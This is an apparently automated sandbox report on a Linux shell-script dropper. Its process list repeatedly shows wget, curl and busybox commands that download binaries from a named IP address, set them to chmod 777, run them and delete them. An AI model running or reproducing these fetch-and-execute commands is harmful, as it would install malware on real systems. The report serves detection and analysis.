Malware Analysis Report

2025-04-03 18:52

Sample ID 241120-c856qatmhm
Target 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
SHA256 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518

Threat Level: Shows suspicious behavior

The file 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 02:45

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

debian9-mipsbe-20240611-en

Max time kernel

96s

Max time network

94s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

